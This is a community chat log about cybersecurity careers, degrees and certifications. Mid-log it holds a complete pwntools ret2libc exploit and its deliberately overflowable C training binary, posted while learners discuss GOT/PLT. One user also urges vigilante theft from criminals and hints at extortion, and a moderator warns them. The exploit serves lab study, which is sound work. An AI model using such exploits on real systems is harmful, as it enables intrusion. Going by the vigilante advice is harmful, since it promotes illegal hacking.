#cyber-and-careers

Granted if you're doing out of state fees then they probably are

But out of state fees are mad

This is true, but a lot of that is made up numbers, where almost nobody pays "sticker price", between scholarships and grants.

In a CV, would you include public attributions to vulnerabilities you've found?

definitely

What section would you have them in?

I'm weighing between having them under publications or having a separate section.

erm, what sections do you have atm?

Work experience, education, skills, publications, other activities. But it's still a work in progress. I decided it's time to rewrite my CV.

I have a lot of brilliant buddies who have struggled very hard to get into the positions that they are without degrees

and most of them are just going back to uni to get a degree because it has limited them

^ I think I've said this before, but not having a degree might also make getting a visa harder.

Also degrees get you an instant network of alumni if yall are close

i would probably say publications, although depending on what you already have in that section it could be changed

Like im pretty fortunate that my Uni's alumni are all super close and will basically drop anything to help a fellow alumni out

A conference article, master's thesis (that has actually been referenced in some articles) and patents. But I guess that's a good place.

Publications could also be put under projects depending on what they entail

Like if it was a research paper that got published I would put that in my projects section

I'm going to put in my 2 cents in that I've seen lack of degree hurt people more than anything..... I've seen people not get advanced due to lack of degree, I've seen people be laid off and have difficulty finding jobs in a down market and it seems like those with lack of degree are more affected than those with (this is in the US)

my company largely won't look at you without a degree (unless you have been in the military), even our help desk is full of people with BS in Computer Science

Yeah definitely agree with this for US

It has definitely not been my experience. I have no degree and have been in IT for 27+ years. I started out making $7/hr. By my 4th year in IT I was making $23/hr. And in my 5th year I had an MCSE and was making $35/hr. I have heard similar from most of my colleagues. I had lead teams of 20+ engineers with none having a degree at all. Some have military, but never if Signal Corps/IT.

Personally I feel the IT is a slightly different animal but that's just me

And i am sure there are plenty of people that don't have degrees. It's the unfortunate reality in the US now that a degree is a requirement whether people like it or not

My experience and reality is that my degree has helped me enormously. My BS was a free 35% pay bump at my first two jobs over coworkers; basically with the same level of experience, I was able to enter those companies 1 or 2 levels higher. For me, amortizing my student loans over the next 10 years has already been a huge ROI over entering industry without the degree. Is a degree for everyone? Probably not; but it has made my career advancement much faster than it would have been otherwise.

I'm in IT, been working in IT for 23 years. It could be regional, it could be based on employer, I can only say based on my experience, I highly recommend a degree.

Does anybody know if there’s a specific format for resumes to succeed or has helped them succeed when employers are looking at it?

There isn't but I loved this book https://thetechresume.com/

I have re-org'ed mine a few times, just make sure you get main bullets in there like: work history, certs, education, etc.

Thank you!!

Awesome CV is a good format. Also tailor your resume to the job and don't just send a generic one

I've said this before but having an internal advocate is also a huge help

@quick forum am I allowed to post a job hunting twitch stream?

What's a job hunting twitch stream?

The streamer will review resumes and help people more effectively search for positions and just provide general advice.

It helped me get my current position

Go for it

The streamer is from BHIS (Black Hills Information Security)

https://www.twitch.tv/banjocrashland

John also does really good training that costs next to nothing, in fact they have one tomorrow I believe that I've already signed up for

Yeah they have a regular rotation of good trainings. Even their paid trainings aren't badly priced

right now its pay what you want, after the last session I had with them I'm signing up for everything I can lol, John is such a great instructor

Where can you sign up?

BHIS' website or Wild West Hacking Fest

the timing isn't great but I was thinking about signing up for the cloud penetration testing

it'd be the week after I do OSCP so brain may be fried/could be depressed 🙂

I'm not sure if John teaches that class but their classes are really chill, you'll get a ton of material and labs to go thru on your own time - imo its almost worth just to be able to pester them with random questions you may have in real time no matter how silly they may be

I know John teaches the intros to cyber sec but I'm not sure what else he teaches

yeah its not John and its not 'pay what you can'

but seems like reasonable price for 16? hours of instruction

Do penetration testers work alone or as a team?

I've pentested apps alone before

Would never send someone on client site alone though

Hi y'all, I'm in a bit of a weird situation, I was wondering if any of you had a suggestion. I graduated in December 2020, and have applied to grad school for cyber sec (and been accepted to some great programs!), but now I'm just sitting at home, doing CTF's and personal projects. I'm having a good time learning, although I would probably like to get some work exp. before grad school in the fall. Anybody been in a situation where they needed temp work for a few months? Does anybody have any other suggestions? Thanks!

Fedex and the package carriers are always hiring. Unless it's an internship I don't see many companies extending a job if they know you're going to leave in a few months

Retail and food service are always hiring. You can also try a temp services agency and see if they can't place you.

I would talk to a temp agency or look on LinkedIn/hiring boards to see if you can find a tech support job. It will give you relevant IT experience and those jobs tend to have high turnover so they are always recruiting.

As a warning, there's kind of a reason they have high turnover

I worked support part time. I aint goin back.

I didn't say it would be fun. But it is IT-specific work experience and will pay (some) money.

Honestly my popular open source projects are viewed as "work experience" to every company I've applied for. I've been paid for them, managed teams, dealt with internal conflicts, decided on the vision, handled failure, and more 😄

I personally would not work a part time job that is not IT specific, I'd rather work on projects (unless they're not popular -- the company might not care as much) 😄

https://www.linkedin.com/jobs/view/2444732723/?refId=uMXmxlEBSZCWvhdC%2B9f8hQ%3D%3D

Interesting CTO position. Be prepared for an online quiz with multiple choice questions regarding percentage calculations, and pattern recognition.

what about in a proper company setting?

a proper company setting? what does that mean?

Corporate setting maybe?

still unsure what that means

and how that's different to what I described

Thanks y'all, I set up an account on Robert Half, I'll have to look into some open-source projects. Any suggestions on where to find and participate in open-source?

it's much more common to work in a team of 2 of 3 than alone

Yeah I'm not exactly sure what they are asking.

@terse stone If your question is asking whether or not the company I work for is a 'proper company', I can't really make that distinction for you. You're welcome to take a look and try to decide for yourself whether it's a company with any real credence. 🙂 https://www.linkedin.com/in/hughraynor/

Small teams though are definitely efficient with pentesting

3, in my academia experience, seems to be the magic number

I'd say that's most common for us as well

Corporate setting is what I meant, my bad for being unclear

It's what I thought to, having only one pentester seem to be a stretched specially we dont expect one person to know everything about a very large subject such as cyber security

I don't think you can get more corporate then where I work 😂

Same here lol

I never worked in a proper corporate setting before as well, over the past 5 years of my career - 4 years was spent on a startup

Corporate is well.... Corporate

I think I'll be pretty lucky if I can find a non-corporate setting after a career change into cyber

https://tenor.com/view/tie-gif-8540606

There's lots of small shops that do cyber

You don't necessarily have to go to a big boi

Oh nice, that's nice to hear. I can't see myself lasting so long in a corporate setting

I don’t know any sole trader pentesters though

I think it’s too much hassle to win work and manage delivery and client relations

Yeah i feel like the one man pentest shop is a unicorn

I’d say it’s a lot easier to get a junior job at a large corporate

Theyre less fussy

definitely the case as a one man software engineering work lol

i havent seen any junior pentest job after searching in a couple of job sites, majority of them are looking for someone who has 3-5 yrs of experience

Join a PHAT company then

@terse stone you US citizen? Can you hold a clearance? Gov is always looking

If you're interested that is. Some people don't want to do that

Nope, I'm not U.S Citizen, although I have relatives in the US and they were encouraging me to apply for a work VISA to work in US companies

figured it would take almost forever to get that citizenship and clearances if i were to do that, so I'm actually looking for opportunities within my country or a remote role (preferably)

Largely depends on what country you're from

Gov work still may be open to you

it's not easy no matter what, but it can be virtually impossible to get a clearance if the US has f e e l i n g s about your home country

Yeah depending on the country you come from. Non US citizens can get clearances its just harder

You'd have one long SF86 lol

oh boy 😅, Philippines is probably on the top list of US Immigration lmao

lots of nursing staff comes from Phillipines

well, for reference that may have changed over the past few years - it took our company 3-4 years to get permanent residency for a coworker from the Philippines

3-4 years is pretty short, i always thought it can take more than 5 years

for citizenship, yeah

permanent residency is usually easier

(also called a "green card" sometimes)

the visa sponsorship is the difficult part... you have to prove the role you are filling cannot be filled by a citizen blah blah blah... but companies do it all the time

and people say it is near impossible to get without a BS (maybe MS)

if you can find a US company with a Philippines office, that helps

Alien of exceptional ability

I believe is the US term

we did it by hiring a Philippines worker at HQ in the US, because they possessed specialized knowledge of our proprietary solution

AMD I think has an office in the Philippines. Maybe Atos as well?

Higher education definitely plays a huge role in getting US based roles as a foreign national. If you aren't going to school in the US with a VISA that lets you work here, your best option is to work for a US company that has an office in your country of residence, and try to finagle a transfer to a US office

Is there anyone from india here???

I wanted to ask

What are options in india

Trying to find entry level cyber jobs is tough after graduating. uuuhhhggg

It's a grind but it's possible

It took me 4 months

Hi Guys. I need your help.

So I visited the EC Council website and submited a form for my interest in training and certification for CEH.

An indian guy called me and offered the iLearn package .

And send me the payment details

How can I fact check if this is a legit person / transaction from EC Council?

trust me its legit. you can call their service to verify

okay so there's a difference between citizenship and permanent residency

thanks for the advice

i figured this might be a problem, i never finished any BS since i dropped out to work on a friend's startup

Yep, non-permanent resident alien (visa), permanent resident alien (green card), US citizen (passport).

ec coincil loves to call people. Personally, I'd skip CEH

Welp definitely never doing ec council certs then. Don't they know that our generation hates phone calls?

ec-council was also the one who had basically a MLM type offer to get people to get their friends to click a link, that you could only get some free offering if 5 friends signed up

definitely not. They love the "for more details on this offer, plz call!"

ya they called me

My favorite feature of Fi is the automated call screening, mostly because it means I get almost 0 spam calls making it through to me, but also in no small part because of how insanely confused the actual human employee calling me for something legitimate becomes when it happens.

It's like "The Google Fi subscriber you are calling is screening unknown calls. Please briefly state why you are calling and I will forward that information to them."

And they always stumble, assume it's a voicemail, and then get even more confused when I see they're legit and let the call through as though I'm somehow still on an old school land-line with an answering machine that you can interrupt partway through the message.

I was studying ROP in 32bit binaries,
the binary contained 2 functions (read, write)
so we took advantage of write to leak memory address of read
and from read to refill the stack with the payload to get a shell.
so far everything makes a lot of sense
however, in the first payload (leaking the memory address) the instructor used objdump -R to get the address of read syscall
and info functions from gdb to get write memory address
and that confused me a lot. since info functions is giving a different address for write
why didn't we just get the address of write using objdump as we did for read?

@glacial hinge?

That is because, with -R flag of objdump you get the relocation address of a function, commonly known as GOT, Global Offset Table, that address is used to jump to the dynamically linked library to access the function, this case, you wanted to get the address of dynamic linked library libc.so.6, due to that, since GOT in respect to the binary contains the address of the function in libc, so you used the -R flag to get the relocation address of a function, and as for write, you needed the PLT address, the Procedural Link Table, this table contains the mapping for the function how it'll be called from the binary, so, what you did here exactly is, using the write@plt to leak the read@got, keep in mind GOT address are used to resolved function definition at runtime, PLT is used to call a function from other library linked.

@surreal tide

@undone shore Got it covered, captain!

Goddamn I'm glad you knew that 😆

:)

Can't let down people who count on me :)

How are you doing?

Exams :(

Aw... 😦
I'm sure you'll smash them though!

I hope so too, been studying :)

Once it's over, I'll be sure to finish my rooms first.

Awesome! 😁
Looking forward to those

It's gonna be blast, you already have those as notes though :p

Ahaha, yeah, they hold pride of place in my notebook 😆

That's a good thing to hear.

Literally 😆

Oh wow

why can't we just use the read@plt instead of read@got?

I mean I had to use read@plt to calculate the offset of system and /bin/sh

Show me the payload or exploit.

#!/usr/bin/env python

from pwn import *

offset = 140
#binary = ELF("./rop3")
context(arch="i386", os="linux")

# write_from_gdb = 0x080483a0
system_off = 0x000a9b80
bin_sh_off = 0x000975ff

junk = "A" * offset
eip = p32(0x080483a0)
ret = p32(0x08048474)
arg1 = p32(0x00000001)
arg2 = p32(0x0804a000)
arg3 = p32(0x00000004)

leak = junk + eip + ret + arg1 + arg2 + arg3
#print leak
exploit = process("./rop3",shell=True)
exploit.sendline(leak)
read_addr = unpack(exploit.recv(4))
log.info("read address is " + hex(read_addr))

system_addr = p32(read_addr - system_off)
bin_sh_addr = p32(read_addr + bin_sh_off)
attack = junk + system_addr + "CCCC" + bin_sh_addr
exploit.sendline(attack)
exploit.interactive()

You used the leaked address of read, which is the address of it belonging to the linked library

read_addr here refers to the leaked libc address.

So technically, you're using a libc address, a resolved read entry from GOT.

the arg2 variable is the read function's address that I got from GOT

I didn't understand how that leaked the address of read from libc

Okay

Do you have the source code of binary?

yeah

If not, when you looked at the functions defined did you see any defined function for read?

#undef _FORTIFY_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

void vulnerable_function()  {
        char buf[128];
        read(STDIN_FILENO, buf,256);
}

void be_nice_to_people() {
        // /bin/sh is usually symlinked to bash, which usually drops privs. Make
        // sure we don't drop privs if we exec bash, (ie if we call system()).
        gid_t gid = getegid();
        setresgid(gid, gid, gid);
}

int main(int argc, char** argv) {
        be_nice_to_people();
        vulnerable_function();
        write(STDOUT_FILENO, "Hello, World\n", 13);
}

Do you see any int read ?

Or any read function defined?

No, right? Because you know the included headers already have defined read function.

no it's a syscall iirc

At the core, yes, it certainly is but it is a defined function in one of the headers files you included.

ok

So, you use header files to include functions used for I/O operations.

For here, it is read for reading input via stdin and write to write data to stdout.

You there?

yeah

Getting any of it?

waiting for your explanation 👀

yeah totally

Oh lol

Just send message that you acknowledge what I say, that will make me continue.

u said that read function is is one of the headers that I included in the code

Okay, so you also know header files you included also have a defined function called system?

yeah

and I know that we need to leak read's memory address to calculate the offset of system function

So, when you compiled it with a compiler, for the header file it links the library, a pre compiled binary for the defined functions in header.

Correct

what I'm not getting is, how is the read@plt is leaked by the read@got if that makes sense? 👀

read@plt is not leaked

What makes you think read@plt was leaked?

because I used p read to calculate the offset of system
and using the leaked address I'm re-calcualting the new addresses to get a shell

read@plt is how program calls a function at runtime resolving.

p read

p read, shows the address of read defined in libc.so.6

exactly

Are you using any gdb plugin?

peda

That is because, read is defined in libc.so.6

That's why you get the address of LIBC's read because debugger can only find that function definition in libc.so.6 itself.

It can't find anything of named "read" nowhere else.

As for plt, do i functions read

You'll see the plt address of read

Which corresponds to binary

yep true

Did you get it now?

can we join a call pls? 😅

A call, I am going for a dinner then I have to study for exams.

You're not getting it yet, are you?

Let me check

unfortunately I didn't get it

👀

https://github.com/D4mianWayne/PwnLand/blob/master/BufferOverflows/ret2libc/32bit/ret2libc-aslr.md

But I didn't explained the GOT and PLT part

Tell me what you don't understand?

Bear in mind, p read is not plt address

Ok so far so good

So, which part confuses you?

the GOT/PLT part

Okay

https://systemoverlord.com/2017/03/19/got-and-plt-for-pwning.html

This explains better than I can.

thanks so much

kinda got it
the GOT holds pointers to the actual functions
hence we used the read@got (the pointer to read@libc) to get the actual address
and leak it
correct? 👀

Yes.

hey guys, so i've finnished an ethical hacking course on udemy that taught me the basics of networking/pentesting/social engineering and web hacking

and the question is, which of these domains should i focus more on?

which one helps me the most in getting a job as a cyber security analyst?

Something similar of CySA+

networking and we hacking will help most to become an analyst

Anyone in a IR/blue team role in the UK mind suggesting what certs would be complimentary? I'll have OSCP, CYSA/CRT, and Sec+ before looking at jobs.

maybe a networking cert? seems like you'll be good with the security side of things from those certs

Any recommendations on which one? 🙂

network+ is the most basic, ccna is very well received

ok thank you. 🙂

you might wanna get some cloud under your belt too!

Tru

analysing aws/azure logs is not fun so if you know how to read them it would be very beneficial

anyone have a list of certain that are generally accepted by the community as beneficial

would be a nice resource for the future

Net+ is "ok", but CCNA is a step above it. If you can get it, get the CCNA. It is the "entry level" networking certification. A+/Net+/Sec+ won't serve you as well as other certs and some employers (in the U.S. at least) won't consider them when making hiring decisions. They want higher level, but still "entry level" certifications. In other words, the CompTIA certs may help you get that first $12/hr. tech support job, but they will likely not help much, if at all, after that.

Comptia certs are big for our IT staff that support classified programs, lots of job listings we have list Comptia certs (and yes, CEH). Sec+ is a great first cert for most people

Interesting. I don't see them in my sector much at all. But then again, I don't do NetSec. I am on the AD/Windows/Azure side of things.

I don't see them in my area (unclassified security engineering) but our big cert is CiSSP... They are on job listings though if you look at the entry level job listings. When I did WAN net admin, CCNA was the big cert there.

This is all good to know for me. I really don't get much outside of my line from recruiters. I do still get the occasional "I saw your resume and you would be a great fit for this Help Desk Technician position in BFE, North Dakota starting at $13/hr. Relocation assistance not provided." I will start reading those for the requirements when I get them. I normally just delete immediately.

Which cert should I get once I finish college, OSCP or Security+, I'm based in Europe specifically Ireland. The type of career I'm looking for is one in red teaming.

Please don't recommend me eJPT

If you want to do pentesting, then oscp

Sec+ isn't a pentest cert.

It's a general security cert

I heard OSCP is super difficult

If i got a security+ would I not be offered the same jobs as OSCP no?

You asked between two certs.

Take a look at job adverts where you are

Jobs that you would want to apply for

Look what they're asking for.

If I use tryhackme only will I be able to pass the OSCP?

And ignore PWK entirely?

Probably not.

PWK?

The best chance for passing the OSCP comes from getting experience. Seeing as many different things as you can. Don't limit yourself to one platform.

The course that you have to buy for OSCP

Like you can't just buy an exam attempt.

Ok. So if I do the PWK and thm, will I pass?

Or wil I have to pay for an extra course?

That's not a question anyone can answer

Do have an OSCP and how did you prepare for the exam aside from using PWK?

No but I know many people who have

Sorry if I'm being a bit annoying btw.

And they all say don't limit yourself to just one platform

The only annoying thing is that I have to keep making the same points

Don't limit yourself to just one place to learn.

No one can know if you'll pass if you do xyz, same as any other exam.

You have to give yourself the best possible chances, but it's just that. Chances.

You can definitely pass OSCP without PWK, and supplement with things like TryHackMe instead.

Skipping the PWK, something you explicitly paid for, seems irresponsible to me.

My career doesn't seem to have been negatively impacted by it. 🙂

Didn't you yourself suggest the best way to pass it was to see as many different boxes as you can?

There's no one size for everyone. I paid a lot of money for an exam attempt basically.

And yep. But my chances were increased because some of the things I did before the exam were relevant to my exam. Doing PWK may help improve methodology, but it should be assumed that nothing in the PWK labs will actually be seen as a solution in the exam.

I was mainly thinking of doing thm along side PWK in order to pass the oscp

That's a good idea. 🙂

Key to my success was immersing myself in as many lab environments as I could, as Ninja said.

The more you see up front, the better chances you have of seeing something similar on your exam.

I haven’t taken the test yet but I have found the PWK useful. I learned some things and strengthened knowledge in other things and my note taking skills have improved a lot.

All depends how you learn best. 🙂

Can confirm. Sorry this was from a while ago

Was in the lab

guys sorry for interrupting i am going throu c4ptur3-th3-fl4g CTF in tryhackme and i am looking if there is anything that will identifie the hash for me other than id-hash.py cuz it tells me that the hash isn't identified ?

#room-hints

i wanted to know if there is any other tools not for this room only even for future rooms

Then #infosec-general

ok thank you

Would you guys recommend buying the 30 day one or the 60 day one?

How long is it actually going to take

Could I get the PWK done in a day?

And do the exam on the same week?

PWK in a day? No way.

lol.

Even if you do the bare minimum for the extra 5 points with the labs, you'd be days of work doing the 10 labs you need, plus their write ups, plus all of the questions you need to answer from the PWK materials.

It's not unheard of for the length of that to be in excess of 75-100 pages.

Plus you have to schedule your PWK lab and materials, which isn't on demand. You would have to wait for them to become active based on the schedule. You would then have to schedule your exam, which is again not on demand and would depend on scheduling.

By the looks of things it'd be difficult to get it done in 30 days, no?

People who have experience bust their butts on 30 days. I had a coworker who was a red teamed and took 2 weeks off work and did it

Sec+ in 30 days is doable right? I have a solid base and a good amount of time to dedicate to it

I just want to ease my pea sized brain

It's possible if you're already above the level for it. If you're actually using the PWK then I wouldn't personally think it's possible

For reference, I was on 60 days. Spent 35-40 of them on the 850 page book (albeit stopping to experiment relatively frequently), and the remainder rooting virtually every machine in the lab

I definitely wouldn't have needed 90 at the pace I was going, but 30 wouldn't have done it

I did it in 14 days with Messer's materials in the last version of the exam.

Alright cool thank you. I plan on spending 12 days doing material and then 12 days doing as many practice exams as I can. I've got GCGA and then Messer's Videos

took me about 3 weeks while taking classes and only putting about 2-4 hours a day in the evenings to study. definitely doable, I was however taking classes in related subjects, so that also influenced.

I used Mike Myers materials

all these certs. all these tests. whats the arguments against contributing to a toolkit or finding a bug for a target company you wish to work at? im not trolling. i truely dont know of a good argument against but there must be.

the critical argument against test products and the like is simply financial. if money is tight, pick a target apart and quietly help the company fix their bug. hunt criminal orgs on their own shops and chat. steal from those whom steal. this will get your the career you seek with cost of materials instead of materials, books and exams. i hope this information helps those with a less than perfect budget

and if you think you can not teach yourself. you are wrong. its more difficult, but it pays off.

First issue - make sure you're following applicable laws. Not all companies participate in bug bounty programs, and if you're going for a job at a company that does not, you may very well be breaking the law by attempting to find vulnerabilities.

Second issue is really just that not all companies will even be impressed enough to want to hire you, so that feels like a hit-and-miss strategy. Of course, so is all job searching, so it's definitely not the worst idea, as long as you're going about it legally and ethically.

-warn @gilded yoke Do not encourage illegal or vigilante activity. Do not encourage stealing.

⚠ Warned Дуже Грімм Лікар#6969

Hm, that was strange.

hey

Bug bounties are the opposite of being able to find a job... why would a company hire you full time if you are willing to do bug bounties and fix their bugs for much cheaper than it'd cost for them to hire you?

i like this robocop and i meant no offense. @pseudo creek most companies cave to extortion was all i was saying

THAT WAS A JOKE

@gilded yoke None of that.

100% agree

i really meant no slight here. @polarbear answered my question

Дуже Грімм Лікар, I would highly advise you to read the rules before you send any more messages.

?

#rules

Question: Is the OSCP a 24 hour exam or you must complete it within 24 hours?

24hrs access to the network, then you have a further 24hrs to make the report

ahh ok.

Since the security+ is easier to get than the OSCP, would it be a better idea to get a security+ first and then an OSCP?

Sec+ is a very good first cert to start off with to get into security/pentesting

Sec+, in the US anyway, will help you get your foot in the door and then many companies will invest in you further by paying for additional certs

Yea I thought this would be a better idea because the OSCP is quite expensive

O.o

Sec+ is also a requirement for many entry jobs in the gov sphere

I was sort of torn getting t an OSCP or Sec+ because I assumed that I wouldn't be red teaming if I got a Sec+

If I get a Sec+ will I be offered the same opportunities and someone with an OSCP?

And is there any point in pursuing a pentest+ after

OSCP just looks too scary 🤣

Sec+ is a test you can prepare in 1-3 weeks, oscp will take notably longer if you know nothing

It's also a performance based test (oscp) versus a multiple choice with some performance based questions

OSCP is considered an entry level penetration cert

But even with OSCP doesn’t mean you’ll get a red team job right off the bat

I thought it was considered higher

What would be categorized higher?

Perhaps some of the SANS certs, but generally the more experience you have, the less certs are really going to be available, there are also some more advanced Offsensive Security certs

red team generally is not considered an entry level job, generally they will want certs and other security/IT experience

that isn't true for everyone but its true for most people

Yeah, my job gives you nearly a 2 year training if you get OCO, no certs but the training is brutal

best idea to see what red team jobs in your area want is to look at job listings

What cert you get after OSCP imo depends on your country/area/role

oh yeah there is that UK cert that requires the OSCP? I always forget abot that one

CREST CRT, supposedly you get literally ask for it, but its worth less or something?

I think they have an exchange program where you get CRT when you do OSCP?

There's another requirement that makes it unrealistic

Question, what would you advice to study/learn, to someone who only has little experience in c++, java, python. But is very eager to start being a part of this community

Something like that yeah, Hugh was saying it's worth less if u do it that way though or something?

Download the syllabus for CompTIA Security+, PenTest+, and Offensive Security's PEN-200/OSCP. Compare what the learning objectives are. Align current knowledge/skillset with that to determine what gaps you have and go from there. This focuses more on course-learning, rather than obtaining certificates. 🙂

to get CRT via equivalency scheme you still need to have CPSA

Note that this equivalency cannot be used to apply for CHECK team member though which is usually why CRT is required by so many jobs

Legend, thank you (CPSA is my next cert(after OSWP))

You got this! Good luck with it

Lemme know how yoou find OSWP, considering it lately

Tanks 🙂 (it's pretty easy)

For projects in my ,CV should I include what package managers they're in if I think they'd know it? Like Kali, ParrotOS, REMnux etc?

Everyone says soc is boring. What makes it boring? I’ve only done help desk. trying to move into soc

anyone here currently in security engineering? i've got some questions in regards the amount of programming you generally end up doing

currently im doing a bachelor of it and looking into doing a masters of cyber security since i've got roughly a year left, essentially i love programming and cyber security work so im wanting to know how much programming is generally used in security engineering

whether it be just limited to bash commands and passing on information or if its quite literally implementing java/api/etc fixes

Security Engineering is fairly broad

Sorry. At gym so fragmented thoughts

the amount of programming you are going to be doing will vary by company, but a lot more companies are trying to automate the simple stuff

bash and python is the extent of my programming on my CS bachelors and every ctf I have done

You got a CS bachelor's with bash and Python only?

yep

Huh - surprising.

some on my course struggled with both

Here you can barely get through intro courses without c++ at least, often c and assembly for a bachelors, beacuse Python just abstracts away most of the actual CS applications

here = US in general, from my experience and those of my peers

You don't have to know programming to do CS

it obviously helps but it is not essential

I have had several interviews were they ask about my programming knowledge, most companies are not looking for in depth programmers just ones that mainly understand the languages and can create scripts etc.

No, but typically you have to be able to implement and manipulate computers at a low level, which does require some level of programming

My cyber security degree had classes in C++, x86 asm, and Mathematica

US

Python was optional

The majority on my course found it difficult to use Linux which I found embarrassing. Forget about the programming side of it

wait, Geekbatman, did you mean CS = cybersecurity or CS = computer science?

Cyber Security, that's why we're in this room right?

I learned most of my programming outside of my degree

yeah me too @golden ore

i did compsci hehe

but you're here because of cyber security though???

that makes waaaaaay more sense - lol. I immediately assume CS = compsci

no not really

so you don't try hack me?

never heard of it

CS will vary on schools, not every college/uni has implemented a cyber degree but computer science has been around for decades

oh...I was ready to fight back 🤣

👀

computer science is absolutely a facet of infosec in general, especially from the security research side

haha, yeah ok I understand the confusion. CS is cyber security to me because I did that course

wow thats weird

what a funny prank

I assumed cs was computer science

https://tenor.com/view/robert-downey-jr-tony-stark-iron-man-avengers-the-avengers-gif-5740839

my course is Network Engineering (Cyber Security)

Figured they were doing a minor or something

We weren't allowed to double major with Computer Science as Computer Security degrees

"too easy"

Every single course overlapped except 2 math courses

Calculus and Discrete Mathematics

Computer engineering gang rise up

https://tenor.com/view/its-riot-time-fat-neil-community-riot-gif-11713239

my degrees are straight cyber sec

Same. I concentrated in Digital Forensics and Information Assurance Management

99/100, your work as a security analyst with a dev team is going to be information/awareness. you won't own the code, don't count on touching it

trust me, some of the people on my course are no competition to anyone. They will be writing policy not doing actual Cyber Security. They are idiots. HR interns.

I chose computer security because I suck at math

Little did I know I would have to take Advanced Number Theory and Cryptography

Maybe I replied to the wrong post to make that point. It's not that they suck at maths. It that they suck at computers

They can write a good report and do good research but I would not trust them to secure my fridge

I was just saying for myself as in "this is why I did sec over Sci"

I got bent by crypto lol

Ah ok. Yeah I'm not bad at maths. I can do it. But I would not like to do it as a career

Midterm I was failing the course and then by the end of the semester I had a 79

Noice

79 ain't bad at all!

Yeah that semester was brutal

Crypto and x86 were both in that semester

yiiikes

I had a .75 semester GPA at the mid point then turned that bus around by the end

Crypto as in the currency/blockchain? or as in crypto-analysis?

Crypto as in cryptosystems

How ciphers work, mathematically, and how to break them

Let me tell you RSA by hand is brutal

ok so looking at Feistel stuff like that?

I don't think we did Feistel specifically but yes

We started at Ceasar ciphers and went all the way to RSA and more modern stuff. The last week we had a crash course on elliptic curve cryptography

ok ok. one of our third year modules was Cryptography and Cyber Security Trends. We touched on Feistel and other cyphers but no major maths. The way UK degrees work are they give the framework of many things and it's up to you as a student how far you take them.

Everything RSA and older we learned and did the math by hand

Then you take them further in whatever career you take up

Is everything taught in the US? or are you expected to research?

My job title is security engineer, but that's just the organization's position name for penetration tester.

I get Linkedin notifications for Security Engineer all the time and none of them sound like what a penetration tester is to me.

I much prefer RSA by hand to pretty much anything else, tbh

I think the only annoying parts were totients and padding - other than that it's pretty straighforward, as opposed to like 4 weird matrix operations for AES, for instance

Like I said earlier, broad brush lol

I'm titled as a Cybersecurity Engineer and I do all sorts of stuff

haha, ok Bob Ross style?

2 months ago I was basically a technical writer. Now I'm doing acceptance testing and writing scripts

And try to figure out how RHEL works without internet. Can't forget that

I’m also titled as cyber security engineer, I’m a security architect

Currently I'm a Steel Detailer. but in 2 months I'll have my Honours Degree in Cyber Security

Yeah i have no idea what my actual job description is

I'm a subcontract, on loan to a contractor, on loan to the government

@frail stream are you past @stoic cave ?

No I'm talking Interstellar time travel shit.

Moose for me is a shortening of my full handle

Ummmmmm........

Wtf

There's a story there somewhere

Who tf are you

or some time?

https://tenor.com/view/devil-gif-8941958

probably best, you'd have burst into flames probably

I'm serious. I want to know how you guessed on the first try.

Because we have no mutual servers

Yes

I don't think i have ever tied my full handle to discord

Note that this is the #cyber-and-careers channel. 🙂

Not clicking a link

was under the impression after analyst work if you go into security engineering you did a fair bit of coding to..

Your reddit is displayed on your discord profile.

Welp. I did not know that lol

The time travelling moose strikes again

Both Canadian or just into magnificent beasts?

This is not the channel for that.

#infosec-general 😉

top two google results:

https://github.com/leogx9r/DiscordCrypt

no idea then sorry

np 🙂

Update your Adobe stuff. Bugs allowed remote code execution

It depends on the role, and how mature the org actually is. Security engineer can be a LOT of different roles, from network policy to documentation of policy, compliance, vulnerability management, forensics, SIEM administration; by all means, that isn't a complete list. that's just what is on the top of my mind. It also depends on what you mean by coding. I don't consider INI, CFG or YAML config file dev to be coding; nor do i consider pipeline scripts coding.

essentially wanting to know if it involves implementing security features with things such as java in a backend environment

obviously languages will vary

I seem to remember hearing that "Security engineer" is super super generic and could be a lot of different things

long story short i love cyber and i love programming and the way the jobs often described gives off the impression you still do a bit of programming as well as cyber operations(analyst,pen,etc)

Usually not. Security usually gets involved in determining what the config should be, but shouldn't be involved with the administration beyond maybe being hands on in a test environment. I'm not a security architect though; I'm not super clear on the differences specifically between security architect and systems engineering architect

I mean, you CAN do a lot of coding, depending on what you mean by coding. When I was a security engineer, I wrote a pretty fair amount of python. Primarily to clean up some data from other processes that wasn't really usable in our purposes

to make it usable

long story short im almost finished by bachelor of it and was considering branching into cyber if programming side would go hand in hand

so was considering doing a masters in cyber since im finally in a good position to do uni for once

I also did a fair amount of SQL to basically do the same thing for some RDBs we needed to extract data from, for compliance reasons

Long term, I think there is more value in a CompSci MS or MBA

so what your basically saying is i would do sql/python or java in some jobs but not in all of them?

i'm not saying that at all

I'm saying I did that, because it made my life easier in my role

ah gotcha

but not everyone in the same role would do the same things

thanks that clarifies alot

and yeah essentially which masters i do is why im looking into this since i dont have commercial experience in it just alot as a hobby/portfolio building projects

there generally isn't a lot of programming in Cyber except if you go into tooling

Technically, writing those scripts was not in my job description. I did it to reduce the reliance on other teams to clean up. I went through the proper channels to get read access to the data i needed, extracted it to my work computer, and transformed it as needed so I could actually use it

I wouldn't recommend going for a MS in cyber if you don't have any experience

Unless it's a specific checkmark on your career path, I'd say find a compsci MS program that has some profs doing security for their novel research

You won't get the security management piece, but IMO, that's the easiest part of cyber to pick up

if you don't have any experience, a MS can actually count against you

that's also true

now if you have a few years in IT, then it probably won't

yeah i was hoping having a built up portfolio would make the masters fine

if you really want the cyber MS, i'd suggest working as a sysadmin or dev for a couple years. And if you have to get loans or pay out of pocket, don't do it

if your workplace doesn't value the degree, you wont' get any value by spending your own money on it

generally, if a company is hiring for entry level, and they have equivalent candidates, one with BS and one with MS, they will most likely choose the BS

gotcha, essentially was looking into masters to also justify doing a bachelor in it instead of a cs degree

had to do it online at the time and couldnt find cs ones online in my area when i was looking

well I would think getting an IT job for a few years would be good or you could get a cert or 2 such as Sec+ and apply to entry level Security positions

for entry level, certifications carry more weight

I didn't go through a cyber program, but the ones I looked at when I was applying to grad schools in 2014 were pretty disappointing. My info on the programs pretty out of date

yeah cyber programs are mostly a survey type program

ah so not really worth the time looking into a cyber program if im already doing an it degree?

You'll get the MOST value from a MS if you can do some kind of novel research

if you aren't interested in research, there are vocational masters programs; they are not as much of a career booster

but again, if you have no IT experience, I wouldn't do a MS

and again, paying for your own MS courses and program is a huge out of pocket expense that you won't recoup very easily

gotcha

thanks guys huge help btw

Is dubai good place to find cyber sec job?

